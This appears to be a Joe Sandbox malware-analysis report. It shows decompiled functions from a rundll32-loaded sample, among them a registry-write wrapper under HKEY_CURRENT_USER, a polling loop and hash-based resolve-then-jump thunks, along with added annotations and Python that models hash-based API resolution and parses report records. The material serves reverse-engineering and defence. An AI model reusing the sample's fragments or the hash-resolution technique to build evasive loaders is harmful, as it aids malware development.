                                                  • Instruction Fuzzy Hash: 59F014B6911119AADB20DFB8D9848CA77FCEB48704B1140B6DA41DB201F6B5EA88CBD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E046B2436(intOrPtr* __edi) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _t15;
                                                  				intOrPtr* _t19;
                                                  				intOrPtr* _t22;
                                                  
                                                  				_t22 = __edi;
                                                  				_push( &_v12);
                                                  				_push(__edi);
                                                  				_v8 = 0x1d4c0;
                                                  				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                  				_t19 = __imp__; // 0x75146490
                                                  				while(1) {
                                                  					_v16 = _t15;
                                                  					 *_t19(0x1f4); // executed
                                                  					if(_v12 == 4) {
                                                  						break;
                                                  					}
                                                  					if(_v8 == 0) {
                                                  						L4:
                                                  						_t15 =  *((intOrPtr*)( *_t22 + 0xe0))(_t22,  &_v12);
                                                  						continue;
                                                  					} else {
                                                  						if(_v8 <= 0x1f4) {
                                                  							_v16 = 0x80004004;
                                                  						} else {
                                                  							_v8 = _v8 - 0x1f4;
                                                  							goto L4;
                                                  						}
                                                  					}
                                                  					L8:
                                                  					return _v16;
                                                  				}
                                                  				goto L8;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec3afd720edb530acc322125bd587086b70dc3969b8fcb55f4d1f441a987d004
                                                  • Instruction ID: d146748dfd4b843ed20738df38cea40c99cfc1f1732e569dc6f2585ce5f4855e
                                                  • Opcode Fuzzy Hash: ec3afd720edb530acc322125bd587086b70dc3969b8fcb55f4d1f441a987d004
                                                  • Instruction Fuzzy Hash: 8DF03771D11219EFDB00DB98C498AEDB7B8EF04304F1080EAE642A7201E3B46B84DFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 54%
                                                  			E046B24E1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				intOrPtr _v12;
                                                  				void* _v18;
                                                  				char _v20;
                                                  				intOrPtr _t14;
                                                  				void* _t16;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosw");
                                                  				_v12 = _a16;
                                                  				_t14 =  *0x46bd27c; // 0x96a5a8
                                                  				_t5 = _t14 + 0x46be10c; // 0x50286b4
                                                  				_t7 = _t14 + 0x46be2a4; // 0x650053
                                                  				_v20 = 3;
                                                  				_t16 = E046B9152(_t5, _a4, 0x80000001, _a8, _t7, _a12, _t5,  &_v20); // executed
                                                  				return _t16;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25416dc5f83a97251f155c61123e6fbc1eefd2a8de289104079b2e92b1e3da94
                                                  • Instruction ID: 0737792363d34c1f43279e6a2d9460ff33fdca9a8e86b3c7e22c67023bfafb98
                                                  • Opcode Fuzzy Hash: 25416dc5f83a97251f155c61123e6fbc1eefd2a8de289104079b2e92b1e3da94
                                                  • Instruction Fuzzy Hash: C4F01C76410109BEDF01DFA8C844CDA77B9FB08304F008526FA05A6221E3B1EA559B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			_entry_(intOrPtr _a8) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t7;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  
                                                  				_t12 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					__imp__(0x46bd23c);
                                                  					if(_t4 == 0) {
                                                  						E046B970F();
                                                  					}
                                                  				} else {
                                                  					_t7 = _t4 - 1;
                                                  					if(_t7 == 0) {
                                                  						__imp__(0x46bd23c);
                                                  						if(_t7 == 1) {
                                                  							_t8 = E046B6A56(_t7, _t9, _t10, _v0); // executed
                                                  							if(_t8 != 0) {
                                                  								_t12 = 0;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t12;
                                                  			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 249d2314d9cd2da13690d5549f748cf0333be48d6cd8430f1225b355c8544388
                                                  • Instruction ID: 9eb0b3617cd1b598eb6adb74ea626786a2abed86ee7c5ca0cc4a6241b25b6930
                                                  • Opcode Fuzzy Hash: 249d2314d9cd2da13690d5549f748cf0333be48d6cd8430f1225b355c8544388
                                                  • Instruction Fuzzy Hash: 72E0DF78204A2157D7303F788808BDAB748AB20BC0F004028F7C4C7250F620E8C08BF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E046B904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                  				char _v8;
                                                  				void* _t13;
                                                  
                                                  				_v8 = 1; // DWORD value 1, handed to the callee below by address with size 4
                                                  				if(_a4 == 0) {
                                                  					// 0x80000001 is the HKEY_CURRENT_USER root handle and 4 matches REG_DWORD, so the
                                                  					// argument pattern (root, type, subkey, value name, &data, size) reads as a registry
                                                  					// value write. The report does not name the callee; this is a reading of the call, not a confirmed API.
                                                  					return E046B6B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
                                                  				}
                                                  				_t13 = E046B24E1(_a4, _a8, _a12, 1); // executed
                                                  				return _t13;
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                  • Instruction ID: 29663bf8dc3b4082e68fff0c3ee732ab58e074b0465cfafdb3bcfbabc29c3784
                                                  • Opcode Fuzzy Hash: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                  • Instruction Fuzzy Hash: 57E01AB2100208FFEF15EF90CC01FEE3B69EB04348F108019BB5495060E672DAA4EB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 62%
                                                  			E046BA66E(void* __edx, void* __edi, char _a4) {
                                                  				void* _t7;
                                                  				void* _t12;
                                                  
                                                  				_t7 = E046B7323(__edx, __edi, _a4,  &_a4); // executed; _a4 is also passed by address, so the callee can update it
                                                  				_t12 = _t7;
                                                  				if(_t12 != 0) {
                                                  					// Arguments are pushed right to left, so the call below receives (__edi, _a4, _t12):
                                                  					// a destination, a source and a length, i.e. a memcpy-style copy of _t12 bytes into the
                                                  					// buffer at __edi. The callee is not named in the report; this is a reading of the argument order.
                                                  					_push(_t12);
                                                  					_push(_a4);
                                                  					_push(__edi);
                                                  					L046B5544();
                                                  					 *((char*)(_t12 + __edi)) = 0; // NUL-terminate the copied bytes
                                                  					E046B9039(_t7, _a4);
                                                  				}
                                                  				return _t12; // the length obtained from E046B7323, or 0 when it returned nothing
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: f507e3709f04d95f70566d7ecd24c6ce0bf52563adf2bb0520b94eee043a7d2b
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 70E08673504228B6D7122A94DC00EEF7F5DCF55695F004029FE8849201F621E99093E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E046BAC81() {
                                                  
                                                  				E046BADE5(0x46bc344, 0x46bd15c); // executed: look up an address through the table at 0x46bc344 using the slot at 0x46bd15c
                                                  				goto __eax; // tail-jump to the address the helper left in eax: a resolve-then-jump thunk
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92beba91b06f3702eb5ea20b00fa785bb8530f48e91d36015a33eec2e68aa76b
                                                  • Instruction ID: 2739e3fba1d8e56bef2f18911a8dbdf5836d8a25727275b3687d681410472db7
                                                  • Opcode Fuzzy Hash: 92beba91b06f3702eb5ea20b00fa785bb8530f48e91d36015a33eec2e68aa76b
                                                  • Instruction Fuzzy Hash: AFB012D5368101BF700415841D16CFA031CC1C091A320C52FF4C0D8104F4807CC603F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E046BAC9C() {
                                                  
                                                  				E046BADE5(0x46bc344, 0x46bd158); // executed: same table as E046BAC81, the adjacent slot 4 bytes lower
                                                  				goto __eax; // tail-jump to the resolved address, the same thunk shape as E046BAC81
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9952e7e0d8c43c349b3a3ccadfa740445efa51be6d4e8314ae223299ced6b016
                                                  • Instruction ID: badcdc0347692b81212a1855572a73cfc9ffb3e91f0a193cc58a8893135d16ff
                                                  • Opcode Fuzzy Hash: 9952e7e0d8c43c349b3a3ccadfa740445efa51be6d4e8314ae223299ced6b016
                                                  • Instruction Fuzzy Hash: CAB012D1368201AF708851881C06CFA021CC1C091A320811FB0C0C8204F4807CC603F5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
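E046BAC81 and E046BAC9C above hand one table address and two adjacent slot addresses (0x46bd15c and 0x46bd158) to the same helper and then jump to whatever it returns in eax, which is the shape of a resolve-then-jump import thunk. The Python below is an added model of that mechanism, not code from the sample or from the Joe Sandbox report: it hashes export names with ROR-13 (an assumed hash chosen for illustration; the report does not identify the hash this sample uses), resolves a slot through the hash, transfers control to the result, and shows the analyst's inverse step of precomputing hashes to label the slot table. The export table and slot table are constructed for the example.

```python
"""Model of a hash-based resolve-then-jump thunk and its inversion (added example)."""
from typing import Callable, Dict, Iterable, List, Optional


def ror13_hash(name: str) -> int:
    """Rotate-right-13 hash over the ASCII bytes of an export name.

    ASSUMPTION: chosen because it is a common choice in position-independent
    loaders; the hash used by the analysed sample is not identified in the report.
    """
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


# Constructed stand-in for a module's export table: name -> callable.
EXPORTS: Dict[str, Callable[..., int]] = {
    "RegSetValueExW": lambda *args: 0,
    "Sleep": lambda ms: ms,
    "VirtualAlloc": lambda size: size + 0x1000,
}

# Constructed slot table: what the stubs carry instead of import names.
SLOT_TABLE: List[int] = [ror13_hash("Sleep"), ror13_hash("VirtualAlloc")]


def resolve_by_hash(exports: Dict[str, Callable[..., int]], wanted: int) -> Optional[Callable[..., int]]:
    """Walk the export names, hash each one, return the callable whose hash matches."""
    for name, fn in exports.items():
        if ror13_hash(name) == wanted:
            return fn
    return None


def thunk(slot: int, *args: int) -> int:
    """Model of the stub: resolve through the table, then transfer control to the result."""
    fn = resolve_by_hash(EXPORTS, SLOT_TABLE[slot])
    if fn is None:
        raise LookupError(f"no export matches hash {SLOT_TABLE[slot]:#010x}")
    return fn(*args)  # stands in for 'goto __eax'


def build_rainbow(names: Iterable[str]) -> Dict[int, str]:
    """Analyst side: precompute hash -> name for candidate API names."""
    return {ror13_hash(n): n for n in names}


def label_slots(table: List[int], rainbow: Dict[int, str]) -> List[str]:
    """Replace each slot hash with the recovered API name, or mark it unknown."""
    return [rainbow.get(h, f"unknown_{h:#010x}") for h in table]


if __name__ == "__main__":
    print(label_slots(SLOT_TABLE, build_rainbow(EXPORTS)))
    print(thunk(0, 250))
```

The analyst-side functions are the useful part: with a list of candidate export names from the DLLs the sample loads, `build_rainbow` plus `label_slots` turns a table of bare hashes back into API names, provided the hash function has been identified correctly first.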

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e84c4c6033bb5eb87e59a3be6a7038efd79f87c77ad4098bf5d8bcc42961462a
                                                  • Instruction ID: 97c48a0a7bcce44872ef556606f5ae463954795abc6f4664b3440f86abd66f7f
                                                  • Opcode Fuzzy Hash: e84c4c6033bb5eb87e59a3be6a7038efd79f87c77ad4098bf5d8bcc42961462a
                                                  • Instruction Fuzzy Hash: D5B01236404100AFDB114B00DD04F05BB21EB54710F005114B3044C070D3368CE0EB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
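Every record in this listing has the same shape: a Memory Dump Source line with the dump file and image offset, the snapshot file, the Opcode and Instruction fuzzy hashes, a uniqueness score and, where decompilation succeeded, a C-Code block headed by its quality percentage. The Python below is an added example, not part of the Joe Sandbox report, that parses records of that shape into structured data so that function names, call targets, indirect-jump thunks and fuzzy hashes can be pivoted on across a report; the sample text is copied from three of the records above, trimmed of the empty Similarity fields.

```python
"""Parser for Joe Sandbox per-function records (added example, sample copied from the listing above)."""
import re
from typing import Dict, List, Optional

SAMPLE = """\
Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
• Opcode Fuzzy Hash: 249d2314d9cd2da13690d5549f748cf0333be48d6cd8430f1225b355c8544388
• Instruction Fuzzy Hash: 72E0DF78204A2157D7303F788808BDAB748AB20BC0F004028F7C4C7250F620E8C08BF1
Uniqueness Score: -1.00%
C-Code - Quality: 100%
    E046B904E(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
        char _v8;
        _v8 = 1;
        if(_a4 == 0) {
            return E046B6B01(0x80000001, 4, _a8, _a12,  &_v8, 4);
        }
        return E046B24E1(_a4, _a8, _a12, 1); // executed
    }

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
• Opcode Fuzzy Hash: 92beba91b06f3702eb5ea20b00fa785bb8530f48e91d36015a33eec2e68aa76b
• Instruction Fuzzy Hash: AFB012D5368101BF700415841D16CFA031CC1C091A320C52FF4C0D8104F4807CC603F5
Uniqueness Score: -1.00%
C-Code - Quality: 100%
    E046BAC81() {
        E046BADE5(0x46bc344, 0x46bd15c); // executed
        goto __eax;
    }

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
• Opcode Fuzzy Hash: e84c4c6033bb5eb87e59a3be6a7038efd79f87c77ad4098bf5d8bcc42961462a
• Instruction Fuzzy Hash: D5B01236404100AFDB114B00DD04F05BB21EB54710F005114B3044C070D3368CE0EB55
Uniqueness Score: -1.00%
"""

RECORD_START = "Memory Dump Source"
FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")          # bullet fields
QUALITY_RE = re.compile(r"C-Code - Quality:\s*(\d+)%")       # start of the C block
SCORE_RE = re.compile(r"Uniqueness Score:\s*(-?[\d.]+)%")
DECL_RE = re.compile(r"^\s*([EL][0-9A-F]{8})\s*\(")          # function declaration line
CALL_RE = re.compile(r"\b([EL][0-9A-F]{8})\s*\(")            # calls to other listed functions


def _new_record() -> Dict:
    return {"fields": {}, "associated": [], "uniqueness": None, "quality": None,
            "function": None, "calls": [], "indirect_jump": False, "code": []}


def parse_records(text: str) -> List[Dict]:
    """Split the listing at each 'Memory Dump Source' and extract one dict per record."""
    records: List[Dict] = []
    cur: Optional[Dict] = None
    in_code = False
    for line in text.splitlines():
        if line.strip() == RECORD_START:
            if cur is not None:
                records.append(cur)
            cur, in_code = _new_record(), False
            continue
        if cur is None:
            continue
        if (m := QUALITY_RE.search(line)):
            cur["quality"], in_code = int(m.group(1)), True
            continue
        if (m := SCORE_RE.search(line)):
            cur["uniqueness"] = float(m.group(1))
            continue
        if not in_code:
            if (m := FIELD_RE.match(line)):
                key, value = m.group(1).strip(), m.group(2).strip()
                if key == "Associated":          # repeats per record, so keep all of them
                    cur["associated"].append(value)
                else:
                    cur["fields"][key] = value
            continue
        cur["code"].append(line)
        if cur["function"] is None and (m := DECL_RE.match(line)):
            cur["function"] = m.group(1)       # the declaration names the function, not a callee
            continue
        if "goto __eax" in line:
            cur["indirect_jump"] = True        # resolve-then-jump thunk marker
        for callee in CALL_RE.findall(line):
            if callee != cur["function"] and callee not in cur["calls"]:
                cur["calls"].append(callee)
    if cur is not None:
        records.append(cur)
    return records


def image_base(rec: Dict) -> Optional[int]:
    """Image base taken from the 'Offset:' part of the Source File field."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", rec["fields"].get("Source File", ""))
    return int(m.group(1), 16) if m else None


def thunk_functions(records: List[Dict]) -> List[str]:
    """Names of decompiled functions that end in an indirect jump through eax."""
    return [r["function"] for r in records if r["indirect_jump"] and r["function"]]


def index_by_instruction_hash(records: List[Dict]) -> Dict[str, Optional[str]]:
    """Instruction fuzzy hash -> function name (None when no C code was produced)."""
    return {r["fields"]["Instruction Fuzzy Hash"]: r["function"]
            for r in records if "Instruction Fuzzy Hash" in r["fields"]}
```

Run it against the text of a whole report section and the `calls` lists give a call graph between the E/L-prefixed functions, `thunk_functions` isolates the import-resolution stubs, and the hash index lets one report's functions be matched against another sample's listing by fuzzy hash.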

                                                  Non-executed Functions